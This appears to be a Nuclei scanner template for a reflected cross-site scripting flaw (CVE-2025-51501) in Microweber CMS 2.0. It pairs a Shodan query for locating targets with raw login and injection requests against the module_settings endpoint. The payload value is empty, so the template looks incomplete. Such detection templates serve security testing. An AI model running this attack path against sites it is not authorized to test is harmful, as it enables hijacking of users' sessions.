id: CVE-2025-51501 info: name: Microweber CMS2.0 - Cross-Site Scripting author: nukunga severity: medium description: | Reflected Cross-Site Scripting (XSS) in the `id` parameter of the `live_edit.module_settings` API endpoint in Microweber CMS2.0 allows execution of arbitrary JavaScript. impact: | Authenticated attackers can execute arbitrary JavaScript in victim browsers through the id parameter in the module_settings API, potentially leading to session hijacking. remediation: | Upgrade Microweber CMS to a version later than 2.0 that properly sanitizes the id parameter in live_edit endpoints. reference: - https://github.com/progprnv/CVE-Reports/blob/main/CVE-2025-51501 - https://nvd.nist.gov/vuln/detail/CVE-2025-51501 metadata: verified: true max-requests: 2 vendor: microweber product: microweber shodan-query: 'http.title:"Microweber"' tags: cve,cve2025,microweber,xss,authenticated,vuln flow: http(1) && http(2) variables: xss_payload: "" http: - raw: - | POST /api/user_login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 username={{username}}&password={{password}}&lang=en_US&where_to=admin_content matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(content_type, "application/json")' - 'contains_all(body, "success\":", "username\":")' condition: and internal: true - raw: - | GET /api/live_edit/live_edit.module_settings?id={{xss_payload}}&type=shop/shipping/gateways/country/admin HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(content_type, "text/html")' - 'contains_all(body, "", "Add Country")' condition: and # digest: 4a0a004730450221008a815bd62f669ee67b3416e2f1d414c70e12ead350365056d0e97e7a183039a1022037a767625d16ca4000bbc6e49ab3471dfc8cbb1361e0d105e652b5339b393492:922c64590222798bb761d5b6d8e72950